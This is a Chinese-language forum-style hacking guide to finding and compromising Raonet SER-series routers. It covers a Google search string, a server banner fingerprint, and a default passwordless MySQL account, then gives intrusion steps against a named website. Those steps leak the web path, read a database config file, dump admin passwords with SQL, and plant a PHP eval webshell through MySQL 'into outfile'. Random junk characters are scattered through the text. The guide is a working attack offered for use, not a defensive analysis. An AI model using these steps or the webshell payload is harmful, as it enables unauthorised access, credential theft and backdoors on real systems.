寻找存在漏洞的路由器方法:
3 Y' h- e5 U+ S, ]$ _( T+ ]5 G4 G7 G0 U
1:google搜索'Raonet Subscriber Ethernet Router'
5 l* x( Z- P4 j
- l- F8 [2 v- Z) N+ z2 M2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
7 X' ^5 P4 S9 ?4 a1 b' ?. C* g# \% t; y( ^! v
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。0 O& X( P. i' p9 u( P7 E- D
: [4 f2 m7 {4 j8 `2 n9 f
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
: x* J3 G& h# o% C b" z6 X4 `
0 A5 ?* c8 l8 N6 n0 u( {- B
8 F; S. _, |4 f, h& n! @, n0 ]5 { S' d3 \9 ], L( K0 [* G7 e
入侵步骤:# l, F; ~+ K9 o" B2 w$ U
8 p( k2 a! v/ T. X1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
9 ^* k" ^3 b$ h+ ~! W- j9 Z% g$ ]6 G8 m6 h5 o% R
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc4 F# s+ J( e8 l+ Q! X4 @4 U
3:得到密码后连接,查看GUI管理密码:
& b) O" H: J7 uuse ser_500
; L2 ]* [) }2 m$ t |select id,passwd from user;
' I- U; ]; H" C3 H. w4:通过数据库写入webshell,执行命令:3 I! ^% y5 n+ n7 w, ?
use mysql;& Z0 B( M; l; a( n
create table ok(cmd TEXT);
( F6 o, J7 u$ p8 V7 b& oinsert into ok values("<?php @eval($_POST[cmd])?>");! o" j- _+ x% W+ x
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
. o0 g3 b1 n2 } |! kdrop table ok;
+ F2 H7 T3 `! ~ T' s2 T3 f: x) \5 D3 @# j
5:连接后门shell.php . @6 K# i9 b8 Q; i+ O7 I0 H
+ ]( S4 L; P- A6. 搞定!
0 x9 u+ ~- g+ S$ t( o6 D$ o# W
' A, I/ c6 D+ k+ P+ B& ` |